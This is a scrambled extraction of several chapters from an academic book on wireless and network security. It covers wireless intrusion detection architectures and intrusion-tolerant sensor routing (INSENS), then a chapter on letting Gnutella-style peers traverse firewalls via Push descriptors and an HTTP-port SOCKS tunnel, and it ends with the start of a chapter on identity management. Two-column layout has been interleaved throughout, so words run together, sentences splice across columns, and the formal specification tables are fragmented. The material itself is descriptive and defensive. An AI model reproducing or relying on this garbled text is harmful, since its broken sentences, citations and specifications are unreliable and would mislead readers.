information gain or reduced entropy are needed. applying the classification rules to the recor
Therefore, a classifier needs featureTherefore, value tests repeated trials may be needed before a
to partition the original dataset into low entropy good anomaly detection model is produced.
subsets. Using this framework, the following pro-
cedure for anomaly detection is applied (Zhang et Detecting Abnormal Activities in Other
al., 2003): (1) select audit data so that the normal Layers
dataset has low entropy; (2) perform appropriate
data transformation according to the entropy mea- Detecting anomalies for other entities of the wire-
sures;compute
) 3( classifierusingtraining data;
less )4 (
networks such as MAC protocols, or entities
applytheclassifiertotestdata;andpost- )5 ( provided
process
by the network (applications and services)
alarms to produce intrusion reports. follows a similar approach as in the physical layer.
For example, the trace data for MAC protocols can
Detecting Abnormal Updates to Routing contain the following features: for the past s sec-
Tables onds, the total number of channel requests, the total
number of nodes making the requests, the largest,
The main requirement of an anomaly detection the mean, and the smallest of all the requests. The
model used by IDSs is a low false positive rate, class can be the range of the current requests by a
calculated as the percentage of legitimate behavior node.Aclassifieronthistracedatadescribesth
variations detected as anomalies. Since the main normal context of a request. An anomaly detec-
concern for ad hoc routing protocols is that the false tionmodelcanthenbecomputed,asaclassifieror
routing information generated by a compromised clusters, from the deviation data. Similarly, at the
node will be disseminated to and used by the other mobile application layer, the trace data can use the
nodes, the trace data can be designed for each node. service as the class (Zhang et al., 2003).
A routing table contains, at the minimum, the next
hop and the distance in hop number. A legitimate
change in the routing table can be caused by the wIrElEss IntrusIon dEtEctIon
physical node movement or network membership systEM ArcHItEcturEs
changes. For a node, its own movement and the
change in its own routing table are the only reli- This section discusses the proposed models,
able and trustable information. Hence, used data architectures, and methods to validate the used
exist on the node’s physical movements and the approaches.
corresponding change in its routing table as the
basis of the trace data. The physical movement is wireless Intrusion tracking system
measured mainly by distance and velocity. The
routing table change is measured mainly by the The wireless intrusion tracking system (WITS)
percentage of changed routes (PCR), the percent- deploys the Linksys WRT54G AP, Linux and other
age of changes in the sum of hops of all the routes open source tools in order to track wireless intruders

in a wireless cell. A WITS is designed to minimize and intelligent routing of intrusion data throughout
the effect of the attacks against wireless networks. the network.
It combines technologies to produce a system that
allows real-time tracking of intruders and extensive Modular IDS Architecture
forensic data gathering (Valli, 2004).
The proposed IDS is built on a mobile agent
• Sacrificial access points (SAP): WITS uses
framework. It employs several sensor types that
the concept of SAPs, which acts as a wireless
performspecificfunctions,suchas:
honeypot and forensic logging device. The
used SAP has conventional wired Ethernet
• Network monitoring: Only certain nodes
capability. Its functionality is severely limited
will have sensor agents for network monitor-
for deployment as a honeypot device. How-
ing, in order to preserve the total computa-
ever, it permits the installation of customized
tional power and the battery power of mobile
firmware, which allows the reduction of
hosts.
installed facilities used as part of the routing
• Host monitoring: Every node on the ad
and AP functionality for the WRT54G. The
hoc network will be monitored internally
firmwarecanbeupgradedtopatchanynew
by a host-monitoring agent. This includes
vulnerabilities or weaknesses. To be success-
monitoring system-level and application-level
ful, the system must retain large, extensive
operations.
and multiple log files that contain system
• Decision-making: Every node will decide
statisticsandsufficientnetworkrelateddata
on the intrusion threat level on a host-level
forforensicreconstructionofanytraffic.The
basis. Specific nodes will collect intrusion
used data are data located in honeypot log
information and make collective decisions
files,snortdata,anddataprovidedbytraffic
about intrusion level.
analysis.Thedatainhoneypotlogfileswill
• Reacting: Every node can react in order to
indicate the level of probing and malicious
protect the host against detected attacks.
activity.Trafficanalysisprovidesanextensive
Reactionscanbepredefinedatthatnode.
analysis of the intruder activity.
• Tracking the intruder: Wireless intruders
have the ability to be mobile and are not con- To minimize power consumption and IDS-re-
strained to use predefined channels, which time, the IDS must be distributed.
lated processing
make them difficult to track. Furthermore, A hierarchy of agents can be used to this end. A
wireless attackers can manipulate layer 1 and hierarchy of agents is composed of three agent
layer 2 of the OSI model to mask activities classes, which are the monitoring agents, decision-
and subsequent detection. WITS uses GPS making agents, and action agents. Some are present
techniques to locate and track intruders on all mobile hosts, while others are distributed
within the wireless cell. The resultant GPS to only selected nodes (Kachirski & Guha, 2003).
data will be stored for later analysis or used Cluster heads, for example, are the typical nodes
by an immediate location process of the at- implementing the monitoring agents. The node
tacking device. selection is naturally dependent on the security
requirements imposed to the mobile nodes.
Agent-based Ids for Ad Hoc wireless
networks Intrusion Response
This section introduces a multi-sensor IDS that The nature of an intrusion response for ad hoc
employs a cooperative detection algorithm. A networks depends on the intrusion type and
mobile agent implementation is chosen to support the network protocols and applications types.
the wireless IDS features such as sensor mobility Examples of responses can be:

• Re-initializing communication channels Multi-layer Integrated Intrusion

between nodes detection and response
• Identifying the compromised nodes and
re-organizing the network to preclude the
promised nodes Given that there are different kinds of vulnerabili-
• Notifying the end user and take appropriate ties in mobile network layers, coordinating IDSs
action within layers is required. The following integration
• Send a re-authentication request to all nodes scheme can be investigated:
in the network to prompt the end-users to au-
thenticate themselves (Zhang et al., 2003) • If a node detects an intrusion that affects the
entire network, it initiates the re-authentica-
tion process to exclude the compromised/ma-
licious nodes from the network.
dIstrIbutEd IntrusIon
• If a node detects a local intrusion at a higher
dEtEctIon layer,lowerlayersarenotified.
Any distributed IDS should enforce mechanisms
In this approach, the detection on one layer
that support the reliability of its nodes as well as
can be initiated from other layers. To do this, the
the distributed analysis, integrity, and privacy of
lower layers need more than one anomaly detection
exchanged alerts. Several critical problems should
model: one that relies on the data of the current
be addressed to provide collaborative methods for
layer and the one that considers information from
wireless distributed intrusion detection. These
the upper layer (Zhang et al., 2003).
problems include the reduction of the volume of
alerts; the decrease the complexity of communica-
tion and bandwidth requirements; and the manage-
ment of heterogeneity of formats and protocols.
wIrElEss tolErAncE And
PrEvEntIon
Ids for Publicwifi system
Intrusion prevention is considered as an extension
of intrusion detection technology, but it is actually
The IDS, used by the WIFI systems, bases its detec-
another form of access control, like an application
tion on network monitoring to produce evidences
layerfirewall.Intrusionpreventionsystems(IPSs)
and share them among all nodes.
were developed to resolve ambiguities in passive
The monitor can be thought as an instance of the
network monitoring by placing detection systems
Ethereal network packet Sniffer. For each captured
online. Showing a considerable improvement upon
packet, Ethereal displays a complete view of the
firewall technologies, IPSs make access control
packet content and adds some general statistics as a
decisions based on application content, rather than
timestamp, frame number, and length in bytes. By
IP address or ports by denying potentially malicious
looking on the Ethernet level header and focusing
activity. There are advantages and disadvantages
on 802.11 frames, source, destination and BSSId
to host-based IPS compared with network-based
addresses; SN; frame type and subtype; and the
IPS.
retryag fl aredistinguished.Otherparametersare
Some IPSs can also prevent yet to be discovered
added such as counters for transmission retries and
attacks,suchasthosecausedbyabufferoverflow.
for frames received with wrong FCS, and packet
Deployed to strengthen wireless security, wireless
transmission time. In this way, a list of events is
IPSs monitor radio frequencies in order to detect
built and matched, to detect in particular, jam-
malicioustraffic.
ming attacks and channel failures. Since all nodes
The development and support of intrusion aware
participate in the detection process, multiple lists
survivable applications in wireless networks are
are matched to combine the two lists into a single
key problems in the provision of wireless services.
list of events (Aime et al., 2006).
0
Significantaspectsofintrusiontolerance Only the include:

BS is allowed to broadcast (Deng et al.,
(1) the ability to adapt to changes in environmental 2003). It proposes a BS authentication using a hash
and operational conditions for surviving intru- function. To prevent DoS/distributed denial of
sions; (2) the coordination and management of service (DDoS) broadcast attacks, unicast packets
adaptation of changes in service provision; (3) must first traverse through the BS. Second, the
the awareness of resource statuses to respond to control routing information has to be authenticated
attack symptoms effectively; and (4) the manage- and encrypted by using symmetric cryptography.
ment of resource redundancy. The following are To address the notion of compromised nodes, re-
two approaches that deploy intrusion tolerance to dundant multipath routing is built into INSENS to
prevent wireless attacks. achieve secure routing.
INSENS proceeds through two phases, route
Intrusion tolerance based on discovery and data forwarding. The first phase
Multiple base stations redundancy discovers the sensor network topology, while the
second deals with forwarding data from sensor
To provide fault tolerance, this research discusses nodes to the BS, and vice versa. Route discovery
a redundancy in the form of multiple base stations is performed in three rounds:
(BSs). Since an adversary can disallow delivery
of sensor data that is routed over only one path to • Duringthefirstround,theBSoods fl arequest
a given BS, a multi-path routing redundancy to message to all the reachable sensor nodes in
improve intrusion tolerance of wireless nodes is the network. The BS broadcasts a request
introduced (Deng, Han, & Mishra, 2004). message that is received by all its neighbors.
The simplest way to set up multiple paths for A sensor, receiving a request message for the
eachnodetomultipleBSsistousea - ooding
fl first
mes time,recordstheidentityofthesenderi
sage: each BS broadcasts a unique request message, its neighbor set and then broadcasts a request
called REQ. Upon the reception of REQ from a message. Two mechanisms are used to counter
BS, it records the packet sender as its parent node attacks. The first one identifies the reques
forthatBS,andre-broadcastsREQtoitsneighbor message initiated by the BS using hash. The
and child nodes. The node then ignores all copies secondmechanismconfiguressensorswith
ofthesameREQthatitreceiveslater.Inthis way, pre-shared keys by applying a keyed
separate
theREQ generated by a BS willbeabletoood fl MAC algorithm to the complete path (Deng
the entire network, even though the network nodes et al., 2005).
forward that message only once. If one BS broad- • During the second round, the sensor nodes
castitsownREQ,everysensornodewillhavesend onetheir local information using a feedback
path for it. However, this scheme cannot prevent a message to the BS. After a node has forwarded
maliciouscompromisednodefromBSspoofingby its request message, it waits a time period
sending forged REQ. Every node will think that before generating a feedback message.
the forged message is generated by the legitimate • In the third round, forwarding tables are com-
BS and will forward the forged REQ. To defend puted by the BS for each sensor node based
against such attack, each BS can authenticate the on the information received in the second
sentREQ(Dengetal..)0,24 round. Then, it sends them to the respective
nodes using a routing update message and
InsEns: Intrusion-tolerant routing waits for a certain period to collect the con-
nectivity information received via feedback
in wireless sensor networks
messages in order to compute possible paths
to each other node. The BS then updates
INSENS (Deng, Han, & Mishra, 2003, 2005) can
the forwarding tables using entries of the
be used to prevent DoS attacks, where individual
form:
nodes are not allowed to broadcast routing data.

(destination, source, and immediate sender). Barbeau, M., Hall, J., & Kranakis, E. (2006, Octo-
ber 4-6). Detection of rogue devices in Bluetooth
Destination is the node ID of the destina- networks using radio frequency fingerprinting.
tion node, source is the node ID of the nodeIn Proceedings of the 3rd IASTED International
that created this data packet, and immediateConference on Communications and Computer
Networks. Lima, Peru.
sender is the ID of the node that just forwarded
this packet. Once the data packet is received,
Boncella, R. J. (2006). Wireless threats and attacks.
a node searches for a matching entry in its
In H. Bidgoli (Ed.), Handbook of information se-
forwarding table. If it finds a match, then
curity (pp. 165-175). John Wiley & Sons.
it forwards the data packet (Deng et al.,
2005). Cretu, G. F., Parekh, J. J., Wang, K., & Stolfo, S.
J. (2006, January 10-12). Intrusion and anomaly
detection model exchange for mobile ad-hoc net-
conclusIon works. In The third IEEE Consumer Communica-
tions & Networking Conference (CCNC).
We have shown in this chapter that WIDSs have an
Deng, J., Han, R., & Mishra, S. (2003, May).
important role in securing the network by protect-
INSENS: Intrusion-tolerant routing in wireless
ing its entities against intrusions and misuse. The
sensor networks. In The 23rd IEEE International
protection is performed based on models capable
Conference on Distributed Computing Systems
of providing a framework for the description and
(ICDCS). Providence.
correlation of attacks. Research works have focused
on the development of techniques, approaches, Deng, J., Han, R., & Mishra, S. (2004, June 28-
and mechanisms, and WIDS architectures. Archi- JulyIntrusion
.) 1 toleranceandanti-trafficanalysis
tectures include radio frequency fingerprinting, strategies for wireless sensor networks. In Pro-
cluster-based detection, mobile devices monitoring, ceedings of the 2004 International Conference
and mobile profile construction. Wireless - intruSystems and Networks (DSN’04)
on Dependable
sion prevention and tolerance are also discussed (pp. 637- 646). Italy.
in this chapter; and systems such as INSENS are
developed. In addition, we have shown that several Deng, J., Han, R., & Mishra, S. (2005). INSENS:
challenges need to be addressed to enhance the Intrusion-tolerant routing for wireless sensor net-
efficiencyofWIDSs. works. [Special issue]. Computer Communications
Journal,9(2 2), 216-230.
Farshchi, J. (2003). Wireless policy development
rEfErEncEs (part 1 & 2), Security focus. Retrieved from
http://www.securityfocus.com/print/infocus/1732
Ahmed, E., Samad, K., & Mahmood, W. (2006). Retrieved from http://www.securityfocus.com/
Cluster-based intrusion detection (CBID) architec-print/infocus/1735
ture for mobile ad hoc networks. In Proceedings
ofAusCERTAsiaPacificInformationTechnology Gupta, V., Krishnamurthy, S., & Faloutsos, M.
Security Conference (AusCERT), Asia. (2002, October). Denial of service attacks at the
MAC layer in wireless ad hoc networks. Anaheim,
Aime, M. D., Calandriello, G., & Lioy, A. (2006, CA: MILCOM—Network Security.
June 26-29). A wireless distributed intrusion
detection system and a new attack model. In Pro- Hall, J., Barbeau, M., & Kranakis, E. (2005, Fe-
th
ceeding of the 11 Symposium in Computers and bruary 3-4). Usingmobilityprofilesforanomaly-
Communications (pp. 35- 40). Italy. based intrusion detection in mobile networks.
Paper presented at the 12th Annual Network and

Distributed System Security Symposium, San Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion
Diego, CA. detection techniques for mobile wireless networks.
WirelessNetworksJournal, 9
(5), 545-556.
Hutchison, K. (2004). Wireless intrusion detec-
tion systems. Retrieved October 18, 2004 from
http://www.sans.org/reading_room/whitepapers/ kEy tErMs
wireless/
Kachirski, O., & Guha, R. (2003, January 6-9). Ef- Access Point (AP): Access point in the base
fective intrusion detection using multiple sensors station in a wireless LAN. APs are typically stand-
in wireless ad hoc networks. In Proceedings of the alone devices that plug into an Ethernet hub or
63 th Hawaii International Conference on System switch. Like a cellular phone system, users can
Sciences (HICSS’03). Hawaii. roam around with their mobile devices and be
handed off from one AP to the other.
Low, C. (2005). Understanding wireless attacks &
detection. Retrieved April 2005, from http://www. Ad Hoc Networks: Ad hoc networks are local
hackerscenter.com/public/Library/782_wireat- area networks or other small networks, especially
tacks.pdf ones with wireless or temporary plug-in connec-
tions, in which some of the network devices are
Mateli, P. (2006). Hacking techniques in wireless
part of the network only for the duration of a com-
networks. In H. Bidgoli (Ed.), Handbook of infor-
munications session or, in the case of mobile or
mation security (pp. 83-93). John Wiley& Sons.
portable devices, while in some close proximity
Nichols, R. K., & Lekkas, P. C. (2002). Telephone to the rest of the network.
system vulnerabilities. McGraw-Hill.
Intrusion Prevention System (IPS): IPS is the
Phifer, L. (2006). Wireless attacks, A to Z. Retrieved software that prevents an attack on a network or
April 10, 2006, from http://searchsecurity.techtar- computersystem.AnIPSisasignificant - stepbe
get.com/generic/0,295582,sid14_gci1167611,00. yond an intrusion detection system (IDS), because
html it stops the attack from damaging or retrieving
data.Whereas,anIDSpassivelymonitorstraffic
Samad, K., Ahmed, E., & Mahmood, W. (2005, bysniffingpacketsoffaswitchport,anIPSresides
September 15-17). Simplifiedclusteringapproach inlinelikeafirewall,interceptingandforwardin
for intrusion detection in mobile ad hoc networks. packets. It can thus block attacks in real time.
In 13th International Conference on Software,
Telecommunications and Computer Networks Intrusion Tolerance: Intrusion tolerance is
SoftCOM
( . ) 502 Split, Croatia. the ability to continue delivering a service when
an intrusion occurs.
Schäfer, G. (2003). Securityinfixedandwireless
networks, An introduction to securing data commu- Wireless Attack: A wireless attack is a mali-
nications. John Wiley and Sons. cious action against wireless system information
or wireless networks; examples can be denial of
Valli, C. (2004, June 28-29). WITS—Wireless in- service attacks, penetration, and sabotage.
trusion tracking system. 3rd European Conference
on Information Warfare and Security. UK. Wireless Intrusion Detection System
(WIDS): The WIDS is the software that detects
Vladimirov, A. A., Gavrilenko, K. V., & Mikhai- an attack on a wireless network or wireless system.
lovsky, A. A. (2004). Counterintelligence: Wireless A network IDS (NIDS) is designed to support
IDS systems. In WI-Foo: The secrets of wireless multiple hosts, whereas a host IDS (HIDS) is set
hacking (pp. 435-456). Pearson/Addison-Wesley. up to detect illegal actions within the host. Most

IDS programs typically use signatures of known trafficpattern.Anintrusiondetectionsystem(IDS)

cracker attempts to signal an alert. Others look for may look for unusual traffic activities. Wireless
deviations of the normal routine as indications of trafficanomaliescanbeusedtoidentifyunknown
an attack. Intrusion detection is very tricky. attacksandDoSoods.
fl
Wireless Sensors Networks (WSN): WSN is Wireless Vulnerability: Wireless vulnerability
a network of RF transceivers, sensors, machine is a security exposure in wireless components. Be-
controllers, microcontrollers, and user interface
fore the Internet became mainstream and exposed
devices with at least two nodes communicating every organization in the world to every attacker
by means of wireless transmissions. on the planet, vulnerabilities surely existed, but
were not as often exploited.
Wireless Traffic Anomaly: Wireless traffic
anomaly is a deviation from the normal wireless

Chapter VII
Peer-to-Peer (P2P)
Network Security:
Firewall Issues
Lu Yan
University College London, UK
IntroductIon filtering, one-way-only, port limiting, etc.,) our

problem has multiple faces and applications have
A lot of networks today are behind firewalls. multitude In requirements.Ageneralsolutiontha
peer-to-peer(P2P)networking,firewall-protected all situations seems to be infeasible in this case.
peers may have to communicate with peers outside ThuswedefinetheproblemasshowninFigure: 1
thefirewall.Thischaptershowshowtodesign P2P
How to provide connectivity between private peers
systemstoworkwithdifferentkindsand publicpeersthroughasinglefirewall?
offirewalls
within the object-oriented action systems frame- We select the object-oriented action systems
work by combining formal and informal methods. framework with Unified Modeling Language
We present our approach via a case study of extend- (UML) diagrams as the foundation to work on. In
ing a Gnutella-like P2P system (Yan & Sere, 2003) thisway,wecanaddressourprobleminaunified
toprovideconnectivitythroughfirewalls. framework with benefits from both formal and
informal methods.
Action systems is a state based formalism. It
ProblEM dEfInItIon is derived from the guarded command language
of Dijkstra 6)97 1 ( and defined using weakest
As firewallshavevarioustopologiessingle, ( double,
precondition predicate transformers. An action,
nested, etc.) and various security policies (packet or guarded command, is the basic building block
P2P Network Security
Figure1.Problemdefinition
in the formalism. An action system is an iterative will in turn announce to all its neighbors C, D,
composition of actions. The action systems frame- E, and F that A is alive. Those computers will
workisusedasaspecificationlanguagerecursively andforthe continue this pattern and announce
correct development of distributed systems. to their neighbors that computer A is alive. Once
Object-oriented (OO)-action system is an ex- computer A has announced that it is alive to the
tension to the action system framework with OO rest of the members of the P2P network, it can
support.AnOO-actionsystemconsistsof afinite
then search the contents of the shared directories
set of classes, each class specifying the behavior of of the P2P network.
objects that are dynamically created and executed Search requests are transmitted over the
in parallel. The formal nature of OO-action systems Gnutella network in a decentralized manner. One
makes it a good tool to build reliable and robust computer sends a search request to its neighbors,
systems. Meanwhile, the OO aspect of OO-action which in turn pass that request along to their neigh-
systems helps to build systems in an extendable bors, and so on. Figure 2 illustrates this model. The
way, which will generally ease and accelerate search request from computer A will be transmitted
the design and implementation of new services to all members of the P2P network, starting with
or functionalities. Furthermore, the final set
computer B, thenofto C, D, E, F, which will in turn
classes in the OO-action system specification is to their neighbors, and so forth.
send the request
easy to be implemented in popular OO languages If one of the computers in the P2P network, for
like Java, C++ or C#. example, computer F, has a match, it transmits the
In this chapter, however, we skip the details of fileinformationname, ( location,etc.back ) through
semantics of action systems (Back & Sere, 1996) all the computers in the pathway towards A (via
and its OO extension (Bonsangue, Kok, & Sere, computer B in this case). Computer A will then
1998). be able to open a direct connection with computer
F and will be able to download that file directly
from computer F.
gnutEllA nEtwork
Gnutella (Ivkovic, 2001) is a decentralized P2P unIdIrEctIonAl fIrEwAlls

file-sharingmodelthatenablesfilesharingwithout
using servers. To share files using the Most corporate networks today are configured
Gnutella
model, a user starts with a networked computer toallowoutboundconnectionsfrom ( thefirewall
A with a Gnutella servent, which works both as protected network to Internet), but deny inbound
a server and a client. Computer A will connect connectionsfrom ( Internettothefirewallprotect
to another Gnutella-networked computer B and network) as illustrated in Figure 3.
then announce that it is alive to computer B. B

Figure 2. Gnutella peer-to-peer model
Thesecorporatefirewallsexaminethe If this packets

direct connection cannot be established, the
of information sent at the transport level to deter- serventattemptingthefiledownloadmayreques
mine whether a particular packet should be blocked. thattheserventsharing pushthe the
filefile
instead.
Each packet is either forwarded or blocked based That is, A servent may send a Push descriptor if it
onasetofrulesdefinedbythefirewall - administra
receivesaQueryHitdescriptorfromaserventtha
tor.Withpacket-filteringrules,firewalls doescan not easily
support incoming connections.
track the direction in which a TCP connection is Intuitively, Push descriptors may only be sent
initiated. The first packets of the TCP three-
along the same way path that carried the incoming
handshakeareuniquelyidentifiedbythe ags
fl
QueryHit they descriptors as illustrated in Figure
contain,andfirewallrulescanusethis Ainformation
servent that receives a Push descriptor with
to ensure that certain connections are initiated in ServentID = n, but has not seen a QueryHit - de
only one direction. A common configuration scriptor forwith ServentID = n should remove the
thesefirewallsistoallowallconnections Push descriptorinitiated from the network. This ensures
by computers inside the firewall, and restrict thatonlyall thoseserventsthatroutedtheQuer
connectionsfromcomputersoutsidethe descriptorsfirewall. will see the Push descriptor.
Forexample,firewallrulesmightspecifythat users our original system specification
We extend
can browse from their computers to a web server (YanSere,
& to
) 302 adoptunidirectionalfirewalls
on Internet, but an outside user on Internet cannot by adding a Push router Rf, which is a new action
browse to the protected user’s computer. system modeling Push routing rules as shown
In order to traverse this kind of firewall, in Table 1. We we compose it with the previous two
introduce a Push descriptor and routing rules action systems (Yan & Sere, 2003) Rc modeling
forservents:Onceaserventreceives aQueryHit
Ping-Pong routing rules and RlmodelingQuery-
descriptor, it may initiate a direct download, but QueryHit routing rules together, to derive a new
it is impossible to establish the direct connection specificationofrouter
if the servent is behind a firewall that does not
permit incoming connections to its Gnutella port. R=|[Rc // Rl // Rf]|

Figure3.Unidirectionalfirewall
Figure 4. Push routing
where on the higher level, we have components Push request, and filename is the requested file
of a new router information. In this way, the initial TCP/IP connec-
tion becomes an outbound one, which is allowed
{<Router, R>, <PingPongRouter, Rc>, <Que- by unidirectional firewalls. Receiving the HTTP
ryRouter, Rl>, <PushRouter, Rf>}. GIV request, the target servent should extract
therequestIPandfilenameinformation,andthen
A servent can request a file push byconstruct routing an HTTP GET request with the above
a Push request back to the servent that sent the information.Afterthat,thefiledownloadprocess
QueryHitdescriptordescribingthetarget file.The to the normal file download proces
is identical
servent that is the target of the Push request should, withoutfirewalls.Wesummarizethesequenceof
upon receipt of the Push descriptor, attempt to es- a Push session in Figure 5.
tablish a new TCP/IP connection to the requesting
servent.Asspecifiedintherefinedfilerepositoryin
Table 2, when the direct connection is established, Port-blockIng fIrEwAlls
thefirewalledserventshouldimmediatelysenda
HTTP GIV request with requestIP, filename and In corporate networks, other kinds of common
destinationIP information, where requestIP and firewalls are port-blocking firewalls, - which usu
destinationIP are IP address information of the ally do not grant long-time and trusted privileges
firewalled servent and the target servent to ports andfor the other than port 80 and
protocols

Table1.Specificationofpushrouter Table 1. continued
Rf=| [ attr serventDB=: null; cKeyword=: null ; fi

filename=: null ; target=: null; [] receivedMsg.type= Push
pushTarget=: null if receivedMsg.info.destinationIP=
obj receivedMsg : Msg; newMsg : Msg; ThisIP
f : FileRepository PushTarget=:
meth SendPush( )= receivedMsg.info.requestIP®
(newMsg := new(Msg(Push)); receivedMsg.info.filename@
newMsg.info.requestIP=: ThisIP ; receivedMsg.info.destinationIP
newMsg.info.filename=: [] receivedMsg.info.destinationIP
receivedMsg.info.filename; ThisIP ^
newMsg.info.destinationIP=: receivedMsg.serventID
receivedMsg.info.IP; serventDB
OutgoingMessage=: newMsg ); ForwardMsg(receivedMsg)
ReceiveMsg()= receivedMsg=: fi
IncomingMessage; fi
ForwardMsg(m)= (m.TTL > 0 od
m.Transmit( ); ]|
OutgoingMessage=: m )
do
true
ReceiveMsg( ); HTTP/HTTPS. For example, port 21 (standard FTP
if receivedMsg.type= QueryHit access) and port 23 (standard Telnet access) are usu-
serventDB := serventDB U ally blocked and applications are denied network
receivedMsg.serventID; traffic through these ports. In this case, HTTP
if receivedMsg.info.keyword= (port 80) has become the only entry mechanism
cKeyword to the corporate network. Using HTTP protocol,
target=: receivedMsg.info.filename for a servent to communicate with another servent
@receivedMsg.info.IP; throughport-blockingfirewalls,theserventhast
if f.firewall pretend that it is an HTTP server, serving WWW
SendPush( ) documents. In other words, it is going to mimick
fi an httpd program.
cKeyword := null
When it is impossible to establish an IP con-
[] receivedMsg.info.keyword
nectionthroughafirewall,twoserventsthatne
to talk directly to each other solve this problem
cKeyword ^
by having SOCKS support built into them, and
receivedMsg.descriptorID
having SOCKS proxy running on both sides. As
descriptorDB
illustrated in Figure 6, it builds an HTTP tunnel
ForwardMsg(receivedMsg)
between the two servents.
After initializtion, the SOCKS proxy creates a
ProxySocket and starts accepting connections on
the Gnutella port. All the information to be sent
by the attempting servent is formatted as a URL
message (using the GET method of HTTP) and an
URLConnection via HTTP protocol (port 80) is

Figure5.Sequencediagramofapushsession
made. On the other side, the target servent accepts conclusIon

the request and a connection is established with
the attempting servent (actually with the SOCKS Thecorporatefirewallisadouble-edgedsword.It
proxy in the target servent). The SOCKS proxy in helps prevent unauthorized access to the corporate
the target servent can read the information sent Web, but may disable access for legitimate P2P ap-
by the attempting servent and write back to it. In plications. There have been protocols such as Point-
this way, transactions between two servents are to-Point Tunneling Protocol (PPTP) (Hamzeh et al.,
enabled. 1999), Universal Plug and Play (UPNP) (Microsoft,
We extend our original system specification Realm
, )02 SpecificIP(RSIP)(BorellaMon & -
(Yan & Sere, ) 302 to adopt port-blocking fire - tenegro, 2000) and Middlebox protocol (Reynolds
walls by adding a new layer to the architecture of Ghosal,
& to
) 02 addressthefirewallproblemsin
servent in Figure 7. This layer will act as a tunnel P2P networking. A recent protocol, JXTA (Gong,
between servent and Internet. 2001) from Sun has provided an alternative solu-
As specified in Table ,3 after receiving - mes to the firewall problem by adding a publicly
tion
sages from the attempting servent and encoding addressable node, called rendezvous server, which
them into HTTP format, the SOCKS proxy sends afirewalledpeercanalreadytalkto.Thescheme
the messages to the Internet via port 80. In the is that peers interact mostly with their neighbors
reverse way, the SOCKS proxy keeps receiving whoareonthesamesideofthefirewallastheyare
messages from HTTP port and decoding them and one or a small number of designated peers can
into original format. With this additional layer, bridge between peers on the different sides of the
our system can traverse port-blocking firewalls
firewall. But the problem posed by firewalls still
without any changes in its core parts. We sum- remains when configuring the firewalls to allow
marize the sequence of a SOCKS proxy session trafficthroughthesebridgepeers.
in Figure 8. WehavespecifiedaGnutella-likeP2Psystem
within the OO-action systems framework by com-
bining UML diagrams. In this chapter, we have
00
Table2.Specificationoffilerepository Figure7.Refinedarchitectureofservent
F=| [ attr firewall*=: false ; fileDB=: FileDB;

cFileDB; filename=: null ; target=: null ;
pushTarget=: null
meth SetTarget(t) = (target=: t );
PushTarget(t)= (pushTarget=: t );
Has(key)= ( dom(fileDB));
Find(key)= (filename=: file ^
{file} ran({key} fileDB))
do
target null
cFileDB:= fileDB;
HTTP_GET(target);
target=: null ;
Refresh(fileDB);
if fileDB= cFileDB
firewall=: true
[] fileDB cFileDB
firewall=: false
fi
[] pushTarget null
HTTP_GIV( pushTarget);
pushTarget=: null ;
Refresh(fileDB)
od
]|
Figure6.Firewallarchitectureandextendablesocket
0
Table3.SpecificationofSOCKSproxy presented our solution to traverse firewalls

P2P systems. We have extended a Gnutella-style
P2Psystemtoadoptunidirectionalfirewallsand
port-blockingfirewallsusingOO-actionsystems.
S=| [ attr listenPort := GnutellaPort;
During the extending work, our experiences show
DestinationPort:=80 that the OO aspect of OO-action systems helps to
obj ProxySocket : Socket; build systems with a reusable, composable, and
HTTPSocket : Socket; extendable architecture. The modular architecture
imsg : Msg; omsg : Msg of our system makes it easy to incorporate new
init ProxySocket= new(Socket(listenPort)); services and functionalities without great changes
HTTPSocket= to its original design.
new(Socket(destinationPort))
do
IncomingRequest null rEfErEncEs
imsg=: EncodeSOCK( DecodeHTTP
(HTTPSocket.Read( ))); Back, R. J. R., & Sere, K. (1996). From action
IncomingMessage=: systems to modular systems. Software Concepts
ProxySocket.Write(imsg) and Tools.
[] OutgoingRequest null Bonsangue, M., Kok, J. N., & Sere, K. (1998). An
omsg=: EncodeHTTP (DecodeSOCK approach to object-orientation in action systems. In
(ProxySocket.Read( ))); Proceedings of Mathematics of Program Construc-
OutgoingMessage=: tionMPC’9
( )8 (LNCS 1422). Springer-Verlag.
HTTPSocket.Write(omsg)
Borella, M., & Montenegro, G. (2000). RSIP:
od
Address sharing with end-to-end security. In Pro-
]|
ceedings of the Special Workshop on Intelligence
at the Network Edge, CA.
Figure 8. Sequence diagram of a SOCKS proxy session
0
Dijkstra, E. W. (1976). A discipline of program- kEy tErMs

ming. Prentice-Hall International.
Action System: An action system is a notation
Gong, L. (2001). JXTA: A network programming
for writing programs, due to Ralph Back. An action
environment. IEEE Internet Computing.
system is a collection of actions. It is executed by
Hamzeh, K., Pall, G., Verthein, W., Taarud, J., repeatedly choosing an action to execute. If it is
Little, W., & Zorn, G. (1999). Point-to-point tun- the case that no action is able to be executed, then
neling protocol (PPTP) (RFC 2637). Retrieved execution of the action system stops.
from http://www.ietf.org/rfc/rfc2637.txt
Firewall: A firewall is a piece of hardware
Ivkovic, I. (2001). Improving Gnutella protocol: and/or software which functions in a networked
Protocol analysis and research proposals. (Tech. environment to prevent some communications
Rep.). LimeWire LLC. forbidden by the security policy, analogous to the
functionoffirewallsinbuildingconstruction.
Microsoft. (2000). Understanding universal plug
and play. White paper. Redmond WA: Author. Peer-to-Peer (P2P): A peer-to-peer (P2P)
computer network is a network that relies primar-
Reynolds, B., & Ghosal, D. (2002). STEM: Secure
ily on the computing power and bandwidth of the
telephony enabled middlebox [Special issue]. IEEE
participants in the network rather than concentrat-
Communications.
ing it in a relatively low number of servers. P2P
Yan, L., & Sere, K. (2003). Stepwise development networks are typically used for connecting nodes
of peer-to-peer systems. In Proceedings of the via largely ad hoc connections.
6th International Workshop in Formal Methods
(IWFM’03), Dublin, Ireland.
0
0
Chapter VIII
Identity Management for
Wireless Service Access
Mohammad M. R. Chowdhury
University Graduate Center – UniK, Norway
Josef Noll
AbstrAct
Ubiquitous access and pervasive computing concept is almost intrinsically tied to wireless communica-
tions. Emerging next-generation wireless networks enable innovative service access in every situation.
Apart from many remote services, proximity services will also be widely available. People currently rely
on numerous forms of identities to access these services. The inconvenience of possessing and using these
identitiescreatessignificantsecurityvulnerability,especiallyfromnetworkandd
wireless service access. After explaining the current identity solutions scenarios, the chapter illustrates
the on-going efforts by various organizations, the requirements and frameworks to develop an innovative,
easy-to-use identity management mechanism to access the future diverse service worlds. The chapter
also conveys various possibilities, challenges, and research questions evolving in these areas.
IntroductIon networked environment. Fast vertical handover

is considered important for managing continued
